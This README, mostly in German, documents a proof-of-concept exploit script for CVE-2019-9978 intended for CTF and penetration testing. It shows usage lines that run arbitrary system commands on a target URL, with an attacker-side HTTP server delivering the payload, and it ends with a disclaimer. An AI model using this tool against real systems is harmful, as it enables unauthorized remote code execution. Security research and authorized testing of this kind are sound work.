
cve-2019-9978 PoC
Dies ist ein Skript, das die Ausnutzung der Sicherheitslücke CVE-2019-9978 auf unkomplizierte Weise ermöglicht. Es ist für den Einsatz in Capture-The-Flag (CTF)-Herausforderungen oder als Proof-of-Concept für Penetrationstests gedacht.
pip install requests) ./cve-2019-9978.py -u http://target.com:9999 -c "your_system_command" -l your_ip:your_port
- `-u` or `--url`: Set the target URL to deliver the payload.
- `-c` or `--command`: Set the system command to run on the target system.
- `-l` or `--local`: Set the IP and port for the HTTP server (optional).
./cve-2019-9978.py -u http://target.com:9999 -c "id" -l 10.10.13.15:12345
Dieser Code dient ausschließlich zu Bildungs- und Testzwecken. Die unbefugte Nutzung auf Systemen ohne entsprechende Genehmigung ist illegal und unethisch. Verwenden Sie ihn verantwortungsbewusst.